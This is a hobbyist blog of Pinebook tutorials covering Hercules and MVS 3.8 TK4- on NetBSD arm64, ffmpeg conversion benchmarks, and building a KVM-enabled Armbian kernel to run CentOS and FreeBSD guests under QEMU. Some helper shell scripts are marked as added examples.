Channel: Astr0baby's not so random thoughts _____ rand() % 100;

Running MVS 3.8 on Hercules NetBSD arm64 Pinebook


The Pinebook is an amazing little piece of hardware, and with its price tag of 100 USD a great way to learn computer basics and enjoy yourself in the meantime.

I have decided to cover my experience with NetBSD -current (thanks to Jared McNeill http://www.invisible.ca/arm/), which now runs very well off microSD cards. The only drawback is that you currently need an external USB wireless interface, since the built-in one is not yet supported by NetBSD.

I have been quite busy building pkgsrc packages for this device and upload them regularly here: http://45.76.81.249/pkgsrc/pinebook/netbsd-aarch64/All/

So far I have built quite a number of emulators that run on the arm64 NetBSD platform, most notably:

  • SimH vax (VAX OpenVMS 7.3)
  • Qemu ppc64 (AIX 7.2)
  • GXemul mips (Ultrix 4.5.0)
  • DOSBox i386
  • Hercules ESA/390 (MVS 3.8)

We will be covering how to set up Hercules and MVS 3.8 (the TK4- system) on the arm64 NetBSD platform.

Assuming we have everything in place (NetBSD is running on the Pinebook off microSD and we have an internet connection), the following was done:

Compile /usr/pkgsrc/emulators/hercules from the pkgsrc framework. Since the latest pkgsrc hercules Makefile is for hercules-3.11, we need to bump it to something more recent; the latest version of Hercules is 3.13 (not counting the Hyperion branch, Hercules 4.0).

So we change the Makefile to pull the latest version (pkgsrc verifies the distfile against distinfo, so the checksums for the new version also have to be regenerated with make makesum before the build will fetch it):

# vi /usr/pkgsrc/emulators/hercules/Makefile
DISTNAME= hercules-3.13

# make install clean clean-depends

Once Hercules is built, we move on to compile the IBM 3278/3279 terminal emulator for X windows:

# cd /usr/pkgsrc/x11/x3270 
# make install clean clean-depends

With these ready we can move on to download the MVS 3.8j Tur(n)key 4- system:

$ mkdir TK4
$ cd TK4
$ wget http://wotho.ethz.ch/tk4-/tk4-_v1.00_current.zip
$ unzip tk4-_v1.00_current.zip 
$ rm tk4-_v1.00_current.zip
- Remove the bundled hercules directory (prebuilt binaries for other platforms) since we are on NetBSD arm64
$ rm -rf hercules

Next we edit the tk4-.cnf configuration file so that MVS gets 2 CPUs; the Pinebook runs on a quad-core ARM Cortex-A53, so there is headroom for it.

In the TK4 directory edit conf/tk4-.cnf as follows:

CPUSERIAL 000699
CPUMODEL 2064 
NUMCPU:=2 
MAXCPU:=2

We do all of this by hand because the TK4- bundle obviously does not ship NetBSD arm64 binaries, so we cannot use its automatic shell-script loader start_herc.

Thanks to the wonderful video blog of Moshix https://www.youtube.com/watch?v=pdtddmdpTZk I have borrowed his idea of running Hercules TK4- on s390x SUSE Linux and translated it to the NetBSD arm64 world.

Start hercules

# hercules -f conf/tk4-.cnf

Once at the Hercules prompt we do the following. First we IPL from the DASD at address 148:

Command ==> ipl 148

We do not want an automatic IPL of MVS: TK4- is configured to autoload properly on Intel, but we don't want some of those things to run here, so we use a manual load with command 03:

Command ==> /r 00,cmd=03

Wait a couple of moments until you see:
HHCCD002I  Writer thread 2 started: tid=Fxxxxxx, pid=xxxxx

We check where we are

Command ==> /d a,l

We should see 0000 TIME SHARING USERS.

Before anything else we need to manually start JES2 (Job Entry Subsystem 2):

Command ==> /s jes2

We specify next the startup options

Command ==> /r 00,noreq

We should see this as the last line:
$HASP099 ALL AVAILABLE FUNCTIONS COMPLETE

We check if jes2 is up

Command ==> /$da

If so we should see:
$HASP000 NO ACTIVE JOBS

We now start VTAM, whose started-task procedure is called NET:

Command ==> /s net

After a few moments we should see:
IST093I N1x   ACTIVE    (N07 - N15)

We check where we are

Command ==> /d a,l

And finally launch TSO

Command ==> /s tso

Now is a good time to connect to the emulated MVS via x3270.

Start the x3270 terminal and connect to 127.0.0.1:3270
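Since start_herc cannot be used here, the manual sequence above can instead be replayed by Hercules itself from a run-commands file (Hercules executes the file named by the HERCULES_RC environment variable at startup, and its pause command waits the given number of seconds before the next line). The script below is an added example, not part of TK4- or the original post; the file name netbsd-ipl.rc and the pause lengths are assumptions.

```shell
#!/bin/sh
# ipl-tk4.sh: added example, not part of TK4- or the original post.
# Replays the manual cold-start sequence (IPL 148, command 03, then JES2,
# VTAM and TSO) through a Hercules run-commands file. Hercules executes the
# file named by HERCULES_RC at startup; "pause N" sleeps N seconds. The
# pause lengths are assumptions: lengthen them if a step is not ready yet.

# write_rc FILE : write the run-commands file for the manual cold start
write_rc() {
    cat > "$1" <<'EOF'
ipl 148
pause 30
/r 00,cmd=03
pause 60
/d a,l
/s jes2
pause 20
/r 00,noreq
pause 30
/$da
/s net
pause 60
/d a,l
/s tso
EOF
}

# rc_mvs_commands FILE : print only the MVS console commands (lines that
# start with "/"), one per line, so the order can be reviewed before a run
rc_mvs_commands() {
    grep '^/' "$1"
}

# start_tk4 TK4_DIR : generate the file inside the TK4 directory and hand it
# to Hercules together with the configuration edited above
start_tk4() {
    cd "$1" || return 1
    if [ -d hercules ]; then
        echo "warning: the bundled hercules/ directory (foreign binaries) is still present" >&2
    fi
    write_rc netbsd-ipl.rc
    HERCULES_RC=netbsd-ipl.rc exec hercules -f conf/tk4-.cnf
}

# Only launch when run as a script, not when the functions are sourced
if [ "${0##*/}" = "ipl-tk4.sh" ]; then
    start_tk4 "${1:-.}"
fi
```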

It is a good idea to read some documentation first before using the MVS :)
http://wotho.ethz.ch/tk4-/MVS_TK4-_v1.00_Users_Manual.pdf

The login details to the TSO are:

Login as herc01, password: CUL8TR

To shut down MVS properly please follow this procedure:

It is also possible to run MTS (the Michigan Terminal System). MTS has been made available to run, test and learn from here: https://sites.google.com/site/michiganterminalsystem/mts-d60A

To summarize we need to get the following

  • An updated version of the hercules.cnf file for use with MTS D6.0A (1KB, 19 January 2012). The update corrects a problem with the case of the simulated disk file, should be mts600.dsk, but was MTS600.dsk.
  • In addition to the d6.0A.zip archive, it is recommended that the d6.0.tar.gz archive be downloaded as well since it contains the full set of D6.0 *FS distribution tapes and a number of documentation files that will be useful when using D6.0A. The d6.0.tar.gz archive may be downloaded from http://bitsavers.org/bits/univOfMichigan/mts/d6.0.tar.gz.

A very well documented visual guide is here http://archive.michigan-terminal-system.org/documentation/screenshorts-of-d6-0-and-d6-0a-under-hercules


Pinebook NetBSD arm64 -current multimedia benchmark


This is strictly a NetBSD evbarm (arm64) Pinebook performance test that I wanted to share in case anybody is interested.

Since most of the NetBSD binary packages are built via the pkgsrc framework (which can be a lengthy process, definitely not for the impatient), I stumbled across the following problems on pkgsrc -current and pkgsrc-Q3-2018:

  • /usr/pkgsrc/multimedia/mplayer – fails to compile/build due to some ASM related errors
  • /usr/pkgsrc/multimedia/totem – builds, but even after building a couple of essential gstreamer codec packages it does not play any videos at all
  • /usr/pkgsrc/multimedia/xine – fails to compile/build
  • /usr/pkgsrc/multimedia/ffmpeg* – compiles (see notes below)

Now I will briefly describe what I have done with ffmpeg (it is a part of a hundred other multimedia software projects, so it is probably the best candidate to try).

Note that in the standard pkgsrc Makefiles for ffmpeg2 and later, the ffplay configure option is set to disabled:

CONFIGURE_ARGS+= --disable-ffplay

Since pkgsrc/multimedia/ffmpeg2, ffmpeg3 and ffmpeg4 misbehave slightly during standard builds, I have instead built ffmpeg2 and ffmpeg4 natively (not via the pkgsrc framework) and performed some tests (video conversion and video playback).

During the ffmpeg2 pkgsrc configure stage the scripts complained that there is no openssl installed and bailed out. I used a little "cheat", since I did not want to get into debugging the pkgsrc patch files and Makefiles: I just ran ./configure inside /usr/pkgsrc/multimedia/work/ffmpeg2-xxxx/ and copied all the pkgsrc SDL includes to the local /usr/include.


Next I placed the .configure_done file inside /usr/pkgsrc/multimedia/ffmpeg2/work, and after gmake finished I had to add .build_done to work as well and tweak the PLIST with the new set of files so it would properly build a pkgsrc binary package.

So now I have a fully working ffmpeg2 with ffplay (although the binaries are quite heavy):

 25088 -rwxr-xr-x   1 root  wheel   12721520 Dec  8 23:50 ffmpeg
 24832 -rwxr-xr-x   1 root  wheel   12634352 Dec  8 23:50 ffplay
 24960 -rwxr-xr-x   1 root  wheel   12658928 Dec  8 23:52 ffprobe
 23040 -rwxr-xr-x   1 root  wheel   11681168 Dec  8 23:52 ffserver

So let's do some benchmarking now. For this I have chosen the following YouTube video from Samsung: https://www.youtube.com/watch?v=8leorFMy0rg

Fetching the above on the Pinebook via youtube-dl produced an MKV file "Samsung Plasma TV Demo Full HD 1080p-8leorFMy0rg.mkv" (Matroska data).

Playing the MKV via ffplay was extremely slow, so I decided to convert the file to MP4 via ffmpeg, since we already have it built. Please note that I used an external USB stick to keep the data, since it is much faster than the microSD card I run NetBSD off :)

$ /usr/bin/time -l ffmpeg -i Samsung\ Plasma\ TV\ Demo\ Full\ HD\ 1080p-8leorFMy0rg.mkv -strict -2 -qscale 0 samsung.mp4
built with gcc 6.5.0 (nb4 20181109)
configuration: --prefix=/usr/pkg --mandir=/usr/pkg/man --docdir=/usr/pkg/doc --sysinclude=/usr/pkg/include
libavutil 54. 31.100 / 54. 31.100
libavcodec 56. 60.100 / 56. 60.100
libavformat 56. 40.101 / 56. 40.101
libavdevice 56. 4.100 / 56. 4.100
libavfilter 5. 40.101 / 5. 40.101
libswscale 3. 1.101 / 3. 1.101
libswresample 1. 2.101 / 1. 2.101
Input #0, matroska,webm, from 'Samsung Plasma TV Demo Full HD 1080p-8leorFMy0rg.mkv':
Metadata:
COMPATIBLE_BRANDS: iso6avc1mp41
MAJOR_BRAND : dash
MINOR_VERSION : 0
ENCODER : Lavf56.40.101
Duration: 00:01:47.18, start: 0.007000, bitrate: 1515 kb/s
Stream #0:0(und): Video: h264 (High), yuv420p(tv, bt709), 1920x1080 [SAR 1:1 DAR 16:9], 29.97 fps, 29.97 tbr, 1k tbn, 59.94 tbc (default)
Metadata:
CREATION_TIME : 2018-11-13 09:39:56
LANGUAGE : und
HANDLER_NAME : VideoHandler
DURATION : 00:01:47.140000000
Stream #0:1(eng): Audio: opus, 48000 Hz, stereo, fltp (default)
Metadata:
LANGUAGE : eng
DURATION : 00:01:47.181000000
Please use -q:a or -q:v, -qscale is ambiguous
Output #0, mp4, to 'samsung.mp4':
Metadata:
COMPATIBLE_BRANDS: iso6avc1mp41
MAJOR_BRAND : dash
MINOR_VERSION : 0
encoder : Lavf56.40.101
Stream #0:0(und): Video: mpeg4 ( [0][0][0] / 0x0020), yuv420p, 1920x1080 [SAR 1:1 DAR 16:9], q=2-31, 200 kb/s, 29.97 fps, 30k tbn, 29.97 tbc (default)
Metadata:
CREATION_TIME : 2018-11-13 09:39:56
LANGUAGE : und
HANDLER_NAME : VideoHandler
DURATION : 00:01:47.140000000
encoder : Lavc56.60.100 mpeg4
Stream #0:1(eng): Audio: aac ([64][0][0][0] / 0x0040), 48000 Hz, stereo, fltp, 128 kb/s (default)
Metadata:
LANGUAGE : eng
DURATION : 00:01:47.181000000
encoder : Lavc56.60.100 aac
Stream mapping:
Stream #0:0 -> #0:0 (h264 (native) -> mpeg4 (native))
Stream #0:1 -> #0:1 (opus (native) -> aac (native))

347.74 real 1024.24 user 6.37 sys
125384 maximum resident set size
0 average shared memory size
0 average unshared data size
0 average unshared stack size
30829 page reclaims
0 page faults
0 swaps
0 block input operations
212 block output operations
0 messages sent
0 messages received
0 signals received
41228 voluntary context switches
15818 involuntary context switches

ffmpeg version 2.8.14 Copyright (c) 2000-2018 the FFmpeg developers
built with gcc 6.5.0 (nb4 20181109)

So the above translates to 00:05:47 of clean conversion time using ffmpeg2.

When executed via ffmpeg4

ffmpeg version 4.1 Copyright (c) 2000-2018 the FFmpeg developers
built with gcc 6.5.0 (nb4 20181109)

 329.67 real 1016.10 user 5.38 sys

Which is roughly the same (slightly faster than with ffmpeg2).

I have done exactly the same on my Panasonic Toughbook CF-53, which has an Intel(R) Core(TM) i5-3320M CPU @ 2.60GHz (4 cores):

$ time ffmpeg -i Samsung\ Plasma\ TV\ Demo\ Full\ HD\ 1080p-8leorFMy0rg.mkv -strict -2 -qscale 0 samsung.mp4
built with gcc 7 (Ubuntu 7.3.0-16ubuntu3)
  configuration: 
  libavutil      56. 18.102 / 56. 18.102
  libavcodec     58. 21.104 / 58. 21.104
  libavformat    58. 17.101 / 58. 17.101
  libavdevice    58.  4.101 / 58.  4.101
  libavfilter     7. 25.100 /  7. 25.100
  libswscale      5.  2.100 /  5.  2.100
  libswresample   3.  2.100 /  3.  2.100
Input #0, matroska,webm, from 'Samsung Plasma TV Demo Full HD 1080p-8leorFMy0rg.mkv':
  Metadata:
    COMPATIBLE_BRANDS: iso6avc1mp41
    MAJOR_BRAND     : dash
    MINOR_VERSION   : 0
    ENCODER         : Lavf56.40.101
  Duration: 00:01:47.18, start: -0.007000, bitrate: 1515 kb/s
    Stream #0:0(und): Video: h264 (High), yuv420p(tv, bt709, progressive), 1920x1080 [SAR 1:1 DAR 16:9], 29.97 fps, 29.97 tbr, 1k tbn, 59.94 tbc (default)
    Metadata:
      CREATION_TIME   : 2018-11-13 09:39:56
      LANGUAGE        : und
      HANDLER_NAME    : VideoHandler
      DURATION        : 00:01:47.140000000
    Stream #0:1(eng): Audio: opus, 48000 Hz, stereo, fltp (default)
    Metadata:
      LANGUAGE        : eng
      DURATION        : 00:01:47.181000000
Please use -q:a or -q:v, -qscale is ambiguous
Stream mapping:
  Stream #0:0 -> #0:0 (h264 (native) -> mpeg4 (native))
  Stream #0:1 -> #0:1 (opus (native) -> aac (native))
Press [q] to stop, [?] for help
Output #0, mp4, to 'samsung.mp4':
  Metadata:
    COMPATIBLE_BRANDS: iso6avc1mp41
    MAJOR_BRAND     : dash
    MINOR_VERSION   : 0
    encoder         : Lavf58.17.101
    Stream #0:0(und): Video: mpeg4 (mp4v / 0x7634706D), yuv420p, 1920x1080 [SAR 1:1 DAR 16:9], q=2-31, 200 kb/s, 29.97 fps, 30k tbn, 29.97 tbc (default)
    Metadata:
      CREATION_TIME   : 2018-11-13 09:39:56
      LANGUAGE        : und
      HANDLER_NAME    : VideoHandler
      DURATION        : 00:01:47.140000000
      encoder         : Lavc58.21.104 mpeg4
    Side data:
      cpb: bitrate max/min/avg: 0/0/200000 buffer size: 0 vbv_delay: -1
    Stream #0:1(eng): Audio: aac (LC) (mp4a / 0x6134706D), 48000 Hz, stereo, fltp, 128 kb/s (default)
    Metadata:
      LANGUAGE        : eng
      DURATION        : 00:01:47.181000000
      encoder         : Lavc58.21.104 aac

real	0m30,361s
user	1m29,559s
sys	0m0,825s

Which equals 30 seconds, using ffmpeg v. N-91455 on Intel x86_64

Finally I wanted to play the resulting video on the Pinebook via ffplay (ffmpeg2), and here is the result.

I am not sharing the playback via ffplay (ffmpeg4) because it's too choppy and slow.

Stats for this blog


First time I’m doing this, here are some statistics for this blog (which originally served only as a backup for general knowledge) -> Happy New Year 2019 !

And here are the actual statistics

So thank you again !

All the best in 2k19 !

Enabling KVM in aarch64 Debian 9.6 for accelerated virtualization of CentOS 7.6 aarch64


The Armbian guys are great in what they do with the sunxi64 kernel for the Pinebook. I have been experimenting with the Pinebook for 2 months now and so far I have used the native Ubuntu 18.04 aarch64 distro, NetBSD -current from Jared McNeill (http://www.invisible.ca/arm/) and Armbian for Pinebook (https://www.armbian.com/pinebook-a64/).

So far I have had the best experience with the Armbian pinebook-a64 Linux distribution, and here I would like to describe the process of getting full KVM support in Armbian Bionic based on the 4.19.x kernel.

Unfortunately the current 4.19.2-sunxi64 kernel does not have KVM virtualisation support enabled, so any attempt at running aarch64 virtual machines in QEMU on the Pinebook will be horribly slow.

Installation of the Armbian Stretch 4.19.x distribution is straightforward; I have used the image transferred to a 64GB microSD card (100 mb/s as minimum speed). All this can easily be done on the current Linux machine via the following commands:

x86_64 LAPTOP

$ wget https://dl.armbian.com/pinebook-a64/Debian_stretch_next.7z
$ su  
# dd if=Armbian_5.69_Pinebook-a64_Debian_stretch_next_4.19.13.img of=/dev/sd(X)   <- check what your USB microSD adapter is

Once the image is transferred, please follow the official documentation on how to set up networking and everything else, which I'm not going to cover here. It is straightforward.

So once we have the Pinebook booted and connected to the internet, make sure you get all packages updated

aarch64 PINEBOOK

# apt-get update
# apt-get upgrade

Then we can go on and install the latest Qemu; for this we need to enable the testing repository in /etc/apt/sources.list:

aarch64 PINEBOOK

root@pinebook:/etc/apt# cat sources.list
deb http://httpredir.debian.org/debian  testing main contrib non-free
#deb-src http://httpredir.debian.org/debian stretch main contrib non-free

deb http://httpredir.debian.org/debian stretch-updates   main contrib non-free
#deb-src http://httpredir.debian.org/debian stretch-updates main contrib non-free

deb http://httpredir.debian.org/debian stretch-backports  main contrib non-free
#deb-src http://httpredir.debian.org/debian stretch-backports main contrib non-free

deb http://security.debian.org/ stretch/updates testing main contrib non-free
#deb-src http://security.debian.org/ stretch/updates main contrib non-free

deb http://httpredir.debian.org/debian jessie main contrib non-free

Next we can install qemu-system, which pulls in softmmu support for every target (x86, sparc, ppc, mips, arm), although for accelerated virtualization we obviously only need qemu-system-arm (this package includes both qemu-system-arm and qemu-system-aarch64). We will also need to install qemu-utils and qemu-efi-aarch64:

aarch64 PINEBOOK

# apt-get install qemu-system qemu-efi-aarch64

So now we are ready to build our customized Armbian Stretch 4.19.x kernel based on mainline, since the stock one does not include KVM support.

For this I have followed this guide: https://docs.armbian.com/Developer-Guide_Build-Preparation/

What we will need is the following:

I have used the following config on my Linux Mint 19.1 – make sure you create a large enough VDI disk to hold all the build files, minimum is 20 GB, 50 GB is recommended.

Also I'm using the following host-only adapter network setup so that I can easily access the VM from my host and vice versa via ssh/scp.

For this to work I have the following network configuration script, which I run after starting the VirtualBox manager (to get the vboxnet0 interface registered first):

x86_64 LAPTOP

root@panasonic:/home/user# cat networking.sh 
#!/bin/sh
# Setup tap and bridge: tap0 is owned by "user" so the VM can open it without
# root; br0 joins tap0 with the VirtualBox host-only interface vboxnet0
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl setfd br0 0
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 vboxnet0 
ifconfig tap0 0.0.0.0
# Route and NAT the 10.0.2.0/24 guests out through the laptop's wlan0
sysctl net.ipv4.ip_forward=1
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

Internal IP addresses for the guest VMs are always static, in the following format:

IP:      10.0.2.10-200
Gateway: 10.0.2.2
DNS:     8.8.8.8 or 1.1.1.1

Setup the OpenSSH server and configure the network on the Guest Ubuntu VM accordingly.

So once we have everything ready we can start preparing the guest Ubuntu VM for the kernel build.

Login, elevate to root and run

VirtualBox Ubuntu GUEST

# apt-get -y -qq install git
# git clone --depth 1 https://github.com/armbian/build
# cd build

And run the compile.sh script

VirtualBox Ubuntu GUEST

# ./compile.sh

Select to build the U-boot and kernel packages.

Choose to show kernel options so that we can enable KVM support.

Choose Pinebook-a64.

After a while you should come to the kernel menuconfig.

Make sure to set the following Virtualisation option on (space bar).

And the following subsection should be enabled as built-in and modules.

After some time the kernel packages will be made available in the following directory, which we will scp out of the VirtualBox VM to the Pinebook.

Back on the Pinebook we need to install these packages via apt

aarch64 PINEBOOK 

-rw-r--r-- 1 user user 44152 Jan 11 23:36 linux-dtb-next-sunxi64_5.70_arm64.deb
-rw-r--r-- 1 user user 10422904 Jan 11 23:35 linux-headers-next-sunxi64_5.70_arm64.deb
-rw-r--r-- 1 user user 16571572 Jan 11 23:35 linux-image-next-sunxi64_5.70_arm64.deb
-rw-r--r-- 1 user user 320580692 Jan 11 23:36 linux-source-next-sunxi64_5.70_all.deb
-rw-r--r-- 1 user user 246032 Jan 11 23:35 linux-u-boot-next-pinebook-a64_5.70_arm64.deb

# dpkg -i linux-dtb-next-sunxi64_5.70_arm64.deb
# dpkg -i linux-headers-next-sunxi64_5.70_arm64.deb
# dpkg -i linux-image-next-sunxi64_5.70_arm64.deb

Reboot the Pinebook to load the new KVM-enabled kernel. Once it is up, we should verify we are running the new kernel:

aarch64 PINEBOOK

root@pinebook:/home/user# uname -a
Linux pinebook 4.19.13-sunxi64 #5.70 SMP Sat Jan 12 00:10:12 CET 2019 aarch64 GNU/Linux
root@pinebook:/home/user#

Next we prepare the virtualisation environment where we want to run CentOS 7.6.

Before we actually load QEMU on the Pinebook we need to slightly modify the stock /etc/qemu-ifup script as follows:

#! /bin/sh
# Script to bring a network (tap) device for qemu up.
# The idea is to add the tap device to the same bridge
# as we have default routing to.

# in order to be able to find brctl
PATH=$PATH:/sbin:/usr/sbin
ip=$(which ip)

if [ -n "$ip" ]; then
    ip link set "$1" up
else
    brctl=$(which brctl)
    if [ ! "$ip" -o ! "$brctl" ]; then
        echo "W: $0: not doing any bridge processing: neither ip nor brctl utility not found" >&2
        exit 0
    fi
    ifconfig "$1" 0.0.0.0 up
fi

switch=$(ip route ls |
    awk '/^default / {
            for(i=0;i<NF;i++) { if ($i == "dev") { print $(i+1); next; } }
         }'
)

# Our modification: the default route on the Pinebook goes via wlan0, which
# is not a bridge, so ignore the detected interface and always use our br0
switch=br0

# only add the interface to default-route bridge if we
# have such interface (with default route) and if that
# interface is actually a bridge.
# It is possible to have several default routes too
for br in $switch; do
    if [ -d /sys/class/net/$br/bridge/. ]; then
        if [ -n "$ip" ]; then
            ip link set "$1" master "$br"
        else
            brctl addif $br "$1"
        fi
        exit    # exit with status of the previous command
    fi
done

echo "W: $0: no bridge for guest interface found" >&2

And prepare the following "network" helper script to enable internet connection sharing between host and guest on the Pinebook.

You will however need to install some tools first for this to work

aarch64 PINEBOOK 
# apt-get install uml-utilities
# apt-get install bridge-utils

And then finally save below shell script, make it executable and run it

#!/bin/sh
# Setup tap and bridge: tap0 is owned by "user" so qemu can open it unprivileged
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl setfd br0 0
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 
ifconfig tap0 0.0.0.0
# Route and NAT the 10.0.2.0/24 guests out through the Pinebook's wlan0
sysctl net.ipv4.ip_forward=1
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

Load the above script each time you boot the Pinebook if you wish to run Qemu.
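As an added example (not from the original post), here is a variant of that helper that can be re-run at every boot without stacking duplicate iptables rules, and that only masquerades the 10.0.2.0/24 guest subnet instead of everything that reaches br0. It uses iproute2 (ip tuntap, ip link) in place of tunctl/brctl; the interface names, user and addresses are the post's and are assumptions here.

```shell
#!/bin/sh
# tap-bridge.sh: added example, not from the original post. A re-runnable
# version of the Pinebook bridge/NAT helper: iproute2 instead of tunctl/brctl,
# no duplicate iptables rules when run at every boot, and forwarding limited
# to the guest subnet. Interface names, user and addresses are assumptions.
set -e

GUEST_NET=10.0.2.0/24
BRIDGE_ADDR=10.0.2.2/24
BRIDGE=${BRIDGE:-br0}
TAP=${TAP:-tap0}
TAP_USER=${TAP_USER:-user}   # unprivileged user that opens tap0 (qemu runs as them)
WAN_IF=${WAN_IF:-wlan0}      # interface carrying the Pinebook's uplink

# nat_rules GUEST_NET BRIDGE WAN_IF : print the rules as "TABLE CHAIN args..."
# lines; kept separate from applying them so the set can be reviewed or tested
nat_rules() {
    printf '%s\n' \
        "nat POSTROUTING -s $1 -o $3 -j MASQUERADE" \
        "filter FORWARD -i $2 -o $3 -s $1 -j ACCEPT" \
        "filter FORWARD -i $3 -o $2 -d $1 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT"
}

# rule_add TABLE CHAIN args... : append only if the same rule is not there yet
rule_add() {
    table=$1; chain=$2; shift 2
    iptables -t "$table" -C "$chain" "$@" 2>/dev/null ||
        iptables -t "$table" -A "$chain" "$@"
}

# setup_bridge : idempotent replacement for the tunctl/brctl/ifconfig sequence
setup_bridge() {
    ip link show "$BRIDGE" >/dev/null 2>&1 || ip link add "$BRIDGE" type bridge
    ip link show "$TAP" >/dev/null 2>&1 || ip tuntap add dev "$TAP" mode tap user "$TAP_USER"
    ip link set "$TAP" master "$BRIDGE"
    ip addr replace "$BRIDGE_ADDR" dev "$BRIDGE"   # replace: no error on re-run
    ip link set "$BRIDGE" up
    ip link set "$TAP" up
    sysctl -q -w net.ipv4.ip_forward=1
    # With forwarding on, the Pinebook routes for whatever sits on br0; if it
    # should forward nothing else, also set: iptables -P FORWARD DROP
    nat_rules "$GUEST_NET" "$BRIDGE" "$WAN_IF" | while read -r table chain rest; do
        rule_add "$table" "$chain" $rest   # $rest is split into arguments on purpose
    done
}

# Only apply when run as a script, not when the functions are sourced
if [ "${0##*/}" = "tap-bridge.sh" ]; then
    setup_bridge
fi
```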

On the Pinebook prepare a directory to hold some files; we will be using the Linaro UEFI image:

aarch64 PINEBOOK 

$ mkdir -p ~/KVM/centos
$ cd ~/KVM/centos
$ wget http://mirror.vpsnet.com/centos-altarch/7.6.1810/isos/aarch64/CentOS-7-aarch64-Minimal-1810.iso
$ mv CentOS-7-aarch64-Minimal-1810.iso centos.iso
$ wget http://snapshots.linaro.org/components/kernel/leg-virt-tianocore-edk2-upstream/latest/QEMU-AARCH64/RELEASE_GCC5/QEMU_EFI.img.gz
$ gunzip QEMU_EFI.img.gz 
$ qemu-img create -f qcow2 centos.img 50G 
$ qemu-img create -f qcow2 varstore.img 64M


Next we prepare the qemu loader shell script for this VM in the KVM/centos working directory and make it executable:

#!/bin/sh
# centos.img is the 50G qcow2 disk created above; the loader must name the same file
/usr/bin/qemu-system-aarch64 \
-cpu host -M virt,accel=kvm -m 1024 -nographic \
-drive if=pflash,format=raw,file=QEMU_EFI.img \
-drive if=pflash,file=varstore.img \
-drive if=virtio,file=centos.img \
-drive if=virtio,format=raw,file=centos.iso \
-net nic -net tap

This is it; you should now be able to run CentOS 7.6 aarch64 at almost native speed under KVM on the Debian 9.6 aarch64 Pinebook.

Configuration of CentOS is pretty standard.
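As an added example (not from the original post), the loader below first checks that the rebuilt kernel really has CONFIG_KVM=y and that /dev/kvm is usable by the invoking user (on Debian it is root:kvm 0660, so joining the kvm group beats running QEMU as root), then starts the same guest with an explicit format= on every image so QEMU never has to probe it. The kernel config path /boot/config-$(uname -r) and the function names are assumptions.

```shell
#!/bin/sh
# run-centos-kvm.sh: added example, not from the original post. Verifies the
# KVM-enabled kernel and /dev/kvm before launching, and states the format of
# every image explicitly. File names are the ones used above; the kernel
# config path and the function names are assumptions.

# kernel_has_kvm CONFIG_FILE : 0 if the kernel was built with CONFIG_KVM=y
kernel_has_kvm() {
    grep -q '^CONFIG_KVM=y$' "$1" 2>/dev/null
}

# kvm_node_usable DEVICE : 0 if DEVICE is a character device we can open read/write
kvm_node_usable() {
    [ -c "$1" ] && [ -r "$1" ] && [ -w "$1" ]
}

# image_format FILE : "qcow2" if the file starts with the qcow2 magic "QFI",
# otherwise "raw". Passing format= explicitly matters: a raw disk the guest
# can write to must never be re-probed as qcow2 later, and a qcow2 image passed
# as raw shows up in the guest as a tiny disk holding the container itself.
image_format() {
    if [ "$(dd if="$1" bs=3 count=1 2>/dev/null)" = "QFI" ]; then
        echo qcow2
    else
        echo raw
    fi
}

# launch : the loader from above with the checks in front and formats filled in
launch() {
    cfg=/boot/config-$(uname -r)
    if ! kernel_has_kvm "$cfg"; then
        echo "kernel $(uname -r) was not built with CONFIG_KVM=y (checked $cfg)" >&2
        return 1
    fi
    if ! kvm_node_usable /dev/kvm; then
        echo "/dev/kvm is missing or not accessible; add $(id -un) to the kvm group" >&2
        return 1
    fi
    exec /usr/bin/qemu-system-aarch64 \
        -cpu host -M virt,accel=kvm -m 1024 -nographic \
        -drive if=pflash,format=raw,file=QEMU_EFI.img \
        -drive if=pflash,format="$(image_format varstore.img)",file=varstore.img \
        -drive if=virtio,format="$(image_format centos.img)",file=centos.img \
        -drive if=virtio,format=raw,file=centos.iso \
        -net nic -net tap
}

# Only launch when run as a script, not when the functions are sourced
if [ "${0##*/}" = "run-centos-kvm.sh" ]; then
    launch
fi
```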

FreeBSD 13 aarch64

The above method also works for FreeBSD 13 aarch64 (http://ftp.freebsd.org/pub/FreeBSD/snapshots/arm64/aarch64/ISO-IMAGES/13.0/FreeBSD-13.0-CURRENT-arm64-aarch64-PINEBOOK-20190110-r342911.img.xz), except that the qemu loader is slightly different:

/usr/bin/qemu-system-aarch64 \
-cpu host -M virt,accel=kvm -m 1024 -nographic \
-drive if=pflash,format=raw,file=QEMU_EFI.img \
-drive if=pflash,file=varstore.img \
-drive if=virtio,file=freebsd.img \
-net nic -net tap

Where the freebsd.img is the downloaded img file from the above URL

P.S. To save some space on the default image, run rm -rf /usr/lib/debug inside the guest.

To use a secondary disk vtblk1 use this loader script (and create the disk2.img qcow2 image first):

#!/bin/sh
/usr/bin/qemu-system-aarch64 \
-cpu host -M virt,accel=kvm -m 1024 -nographic \
-drive if=pflash,format=raw,file=QEMU_EFI.img \
-drive if=pflash,file=varstore.img \
-drive if=virtio,bus=0,unit=0,format=raw,file=freebsd.img \
-drive if=virtio,bus=0,unit=1,format=qcow2,file=disk2.img \
-net nic -net tap

The format of each -drive must match how the image was created: a qcow2 disk2.img passed as format=raw shows up inside the guest as a disk only a few hundred sectors long, holding the qcow2 container itself.

Here is a dmesg from FreeBSD 13 aarch64 running under KVM qemu-system-aarch64 on Debian 9.6 aarch64 Pinebook

root@pinebook:/home/user/KVM/FreeBSD# ssh 10.0.2.11
Password for root@freebsd:
Last login: Sun Jan 13 22:56:36 2019
FreeBSD 13.0-CURRENT r342911 GENERIC

Welcome to FreeBSD!

root@freebsd:~ # dmesg

Conky configuration


Some people asked which Conky theme and configuration I use on my desktop.

I don't have a name for it, but the configuration is shown below; save it as ~/.conky/conky.cfg (or point conky at it with the -c option).

  • Please do not forget to change the network interface names (since I use wlp9s0 for my wifi)
  • Also the battery/ACPI stuff should be tuned to your HW.   Mine should work on a Panasonic CF-53
own_window yes
own_window_transparent yes
own_window_type desktop
own_window_hints undecorated,below,sticky,skip_taskbar,skip_pager
own_window_argb_visual true
own_window_argb_value 0
out_to_console no
own_window_class Conky
own_window_type normal 
own_window_transparent yes
use_xft yes
